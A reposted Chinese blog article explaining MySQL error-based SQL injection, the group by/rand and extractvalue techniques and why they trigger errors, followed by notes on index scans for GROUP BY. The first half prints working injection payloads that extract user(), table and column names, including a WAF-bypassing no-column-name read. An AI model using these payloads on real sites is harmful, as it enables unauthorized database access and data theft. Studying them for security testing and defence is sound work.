索引建立group group 索引

转载

mob6454cc79ab13 2024-07-29 20:20:36

文章标签 索引建立group 数据库安全后端字段 文章分类 数据仓库大数据

本文要点

原理探讨（Group by, rand函数相关）

进一步的思考：索引与Group By语句

本文要点

当服务器没有关闭报错回显信息显示时，便可考虑实施报错注入类型的Mysql注入攻击。
如果注入指令的查询结果为空值，且使用concact指令对查询结果进行了拼接，将不会触发报错，使得攻击看上去像是“失效”了一般。例如：

select (extractvalue(1, concat(0x7e,(  select group_concat(id) from test  )))) #
Select count(*),concat(  (select group_concat(id) from test ) ,floor(rand()*2))x from information_schema.tables group by x #

原因：若受查询表"test"正好为空表，那么查询“(select group_concat(id) from test)”的结果显然为null。

而当concat拼接一个null和一个非null串时，会直接返回null值，使语句实际上以如下方式执行，不会触发报错。

Select count(*),(null)x from information_schema.tables group by x;
select extractvalue(1, null ) #

3. 使用基于 group by 和 rand 的报错注入时，必须保证被查询表中至少有两条的数据。例如：

Select count(*),concat((select user()),floor(rand()*2))x from test group by x
# First method
Select count(*),concat((select user()),floor(rand(0)*2))x from test group by x
# Second method(Recommended)

第一种方法和第二种方法的区别在于rand函数的参数，即种子值。

如果不填入参数，则rand函数返回一个伪随机数值。如果填入参数值，rand函数将其作为种子值，生成一个“可重放”的伪随机数序列，并从序列中提取随机值并返回。

对于第二种写法，当test表中有3条及以上数据时，则必定报错，反之，则必定不报错。

对于第一种写法，当test表只有1条数据时，必定不会触发报错。而当test表中的数据条数大于1时，同样有概率不触发报错，具体情况在下文论述。

4. 由于报错注入回显信息长度是有限的，需要配合group_concat和limit、offset等指令，关键字来获取相关信息，例如：

获取表名：

select (extractvalue(1, concat(0x7e,(  select group_concat(table_name) from ( select (table_name) from information_schema.tables limit 2 offset 6)x  )))) #

（2021/05/18 补充）当information_schema被Waf过滤时可以考虑基于union select的无列名sql注入方法：

select aa from (select "aa","bb" union select * from test)a
#基于union select 的无列名读取

获取列名：

select extractvalue(1, concat(0x7e,(  select group_concat(column_name) from information_schema.columns where table_name='FLAG_TABLE'  )))#

原理探讨（Group by, rand函数相关）

0. 关于rand(seed)的一些特性

当参数为空时，rand()返回一个任意的随机值，由于我没有找到详细阐述该函数生成伪随机数方式的文档，因此不进一步展开。

当参数不为空时，rand()函数从一个“可重放”的伪随机数序列中提取值并返回。

“可重放”体现于以下语句，相同的seed的rand()函数能够生成相同的随机数序列：

select rand(3),rand(1),rand(1),rand(3),rand(),rand()
# 0.9057697559760601	0.40540353712197724	0.40540353712197724	0.9057697559760601	0.06270002020774411	0.7339589788894718

“序列”特性体现于以下语句，对于某一张表中的多行数据分别执行rand(seed)函数时，会得到一个可重现的随机序列，而非返回相同值：

select rand(3),rand(3) from test;
# 0.9057697559760601	0.9057697559760601
# 0.37307905813034536	0.37307905813034536
# 0.14808605345719125	0.14808605345719125

官方文档里的专业解释里是这么写的...但我没看懂：

If an integer argument N
With a constant initializer argument, the seed is initialized once when the statement is prepared, prior to execution.
With a nonconstant initializer argument (such as a column name), the seed is initialized with the value for each invocation of RAND().

1. 基于 group 和 rand 的报错注入

https://bugs.mysql.com/bug.php?id=8652

中给出的解释十分简洁：

This problem happens because in a GROUP BY query a RAND expression can be evaluated several times for the same row, every time returning a new result.

group by 与聚类函数（sum,count）被同时使用是使得同一行数据被多次处理的必需条件。

w3cschool教程中关于Group By指令的介绍也仅仅是简单提到了，group by会对表进行分组处理，生成Summary Rows并将其作为查询的返回结果。

为解释该种报错注入的原理，我原本的计划是根据报错信息中的"group_key"顺腾摸瓜，查询group by的底层原理，或者是利用explain指令、process_list表，试试看能否发现指令执行的细节。

可惜没能摸索出什么，只好尝试猜测group by的底层原理，并有了以下发现：

# 此处test中只有5行数据，报错概率极小，语句1
select count(*), concat(user(), floor( rand()*2000) ) x from test group by x;
# 此处的information_schema表中有283行数据，报错概率大->生日攻击，语句2
select count(*), concat(user(), floor( rand()*2000) ) x from information_schema.tables group by x;

#报错概率一般 -语句3
select count(*), concat(user(), floor( rand()*2) ) x from test group by x;
#报错概率一般 -语句4
select count(*), concat(user(), floor( rand()*2) ) x from information_schema.tables group by x;
#报错概率一般 -语句5
select count(*), concat(user(), floor( rand()*200000) ) x from information_schema.tables group by x;

结合此前提到的“多次执行”，~~我的猜测是，执行group by指令后所生成的summary rows中包含"group_key"列，该列的值具备unique属性，且可以为null。~~

......之后我查找到了一个专讲Sql报错注入的帖子MYSQL报错注入的一点总结，然后发现和我的猜测确实有点小偏差 = =，还是把引文里的机制猜解转述过来吧。

根据上述引文所述，基于rand函数与Group By的报错注入在以下情形触发报错注入：

创建虚表，虚表字段分别对应group by所指定的字段x（具备unique属性）以及聚类函数值。
遍历原表中的每一行，计算字段x对应的值value并查询该值是否已出现在虚表中，（这里触发了一次rand函数的执行）
如果已出现在虚表中，则直接更新对应的聚类函数值，否则，则将value插入虚表中（此处value的值会被重新计算，因而，rand函数会被再一次执行）
如果第三步中所生成value已出现在虚表中，那么会触发报错。

基于rand(0)的报错注入的原理，引文解释得十分清楚，这是因为floor(rand(0)*2)生成的序列是 0 1 1 0 1 1，Group By语句会根据上述规则进行如下动作：

第一行：计算value得到0，虚表中的x字段不存在该值，需要进行插入操作。但实际上插入过程中的value值是1（对应上述的第三步）
第二行：计算value得到1，虚表中的x字段存在该值，更新对应的聚类函数值即可
第三行：计算value得到0，虚表中的x字段不存在该值，需要进行插入操作，且实际上插入过程中的value是1，触发主键重名报错。

再回头看基于rand()而非rand(0)的报错注入语句，其中语句3语句4报错概率一般，这是因为一旦floor(rand(0)*2)生成的序列的开头是0 0 1 1/ 0 1 0 0 这种，那么，无论表中有多少行，也不会触发报错，因为字段x的所有可能值已被正确地插入虚表中。

而语句2之所以有较大地报错概率，其原理更像是“碰撞攻击”，即在触发group by操作中第三步的前提下，又正好随机生成了一个虚表中已有的x字段值。

2. extractvalue

基于extractvalue的报错注入，从原理上比较简明，即提交非法的Xpath参数时，可利用回显的报错信息获取敏感信息。

值得注意的是，它还有其他（相对冷门的）攻击面，例如xpath（布尔）注入攻击。可参考https://dev.mysql.com/doc/refman/8.0/en/xml-functions.html

进一步的思考：索引与Group By语句

上述部分对于Sql报错注入的原理的探讨部分揭示了group by语句的运作原理，那么问题来了，mysql里有没有利用索引机制提升group by运行效率的机制呢？毕竟创建临时表然后在原表里一行一行扫，一行一行地更新/插入实在是太low了。

答案是有的。MySql文档中将借助索引信息提高Group By效率的方法分为两类：Loose Index Scan和Tight Index Scan，前者优于后者，它们的特性分别是：

Loose Index Scan
This access method considers only a fraction of the keys in an index, so it is called a Loose Index Scan.
a Loose Index Scan reads as many keys as the number of groups (when no WHERE clause)
looks up the first key of each group that satisfies the range conditions, and again reads the smallest possible number of keys(WHERE clause contains range predicates)
If Loose Index Scan is applicable to a query, the EXPLAIN output shows Using index for group-by in the Extra column.

可见，LIS因为不需要访问索引中的每个键而提升了自身效率。

至于英文文献“索引中的键”(the keys in an index)是指什么，我个人理解是，它是表中每一行数据的标识符，按照某种顺序被保存在索引中。

如果索引的结构是B+树，那么键就是被存储于叶子结点中的数据（具体结构会根据索引所关联的字段是主键与否而发生对应改变），说的不对请纠正、

如果我们构造的Sql查询语句不满足Loose Index Scan的条件，该语句仍可能满足Tight Index Scan办法。

Tight Index Scan
may be either a full index scan or a range index scan
the grouping operation is performed only after all keys that satisfy the range conditions have been found

如果我们构造的Sql查询语句不满足Tight Index Scan的条件，那么数据库将会使用建立临时表的方式来执行Group By方式，比较低效。

总之，为了使sql查询语句具备良好的查询性能，我们需要做的是：建立合适的索引结构；合理构造Sql语句，使它们能够借助索引结构提升查询效率。

以下是针对group by查询的sql代码实验：

desc test_user;
#id	bigint(20)	NO	PRI		auto_increment
#username	varchar(50)	YES	MUL		
#email	varchar(30)	YES		
#password	varchar(32)	YES		

show index from test_user;
#test_user	0	PRIMARY	1	id	A	1000000				BTREE		
#test_user	1	index_name	1	username	A	1000000			YES	BTREE		
#test_user	1	id_uname	1	id	A	1000000				BTREE		
#test_user	1	id_uname	2	username	A	1000000			YES	BTREE		


# 1.Loosen Index Scanning? 
explain select count(distinct username) from test_user group by id;
# 1	SIMPLE	test_user		range	PRIMARY,id_uname	id_uname	161		1000001	100.00	Using index for group-by (scanning)

# 2. 
explain select count(username) from test_user group by id;
# 1	SIMPLE	test_user		index	PRIMARY,id_uname	id_uname	161		1000000	100.00	Using index

# 3. 
explain select username,id from test_user group by id,username
# 1	SIMPLE	test_user		index	id_uname	id_uname	161		1000000	100.00	Using index

# 4. 
explain select username,id from test_user group by username,id;
# 1	SIMPLE	test_user		index	id_uname	id_uname	161		1000000	100.00	Using index; Using filesort


# 5. group by using temporary table
explain select count(*) from test_user group by id%100;
# 1	SIMPLE	test_user		index	PRIMARY,id_uname	PRIMARY	8		1000000	100.00	Using index; Using temporary; Using filesort

索引结构：本表一共包含3个索引，主键(id字段)索引，username字段索引以及id字段和username字段的复合索引。

语句1：extra栏中的"using index for group-by"说明触发了松散索引扫描，但不知道(scanning)是什么意思

语句2：不同的聚类函数会使得查询语句转而无法触发松散索引扫描，具体判定方法请看mysql文档

语句3：不知为何，没能够像文档中所述地触发松散索引扫描，推测原因是优化器觉得没有必要进行松散扫描？

语句4：group by 后的字段顺序与复合索引中的字段顺序不一致时，需要对group by结果进行排序( using filesort )。这是因为语句4中的group by语句需要以username 作为第一关键字对结果进行排序。此时无法利用索引结构帮助计算。

语句5：使用临时表方法执行group by语句，效率较低，应尽量避免

本文章为转载内容，我们尊重原作者对文章享有的著作权。如有内容错误或侵权问题，欢迎原作者联系我们进行内容更正或删除文章。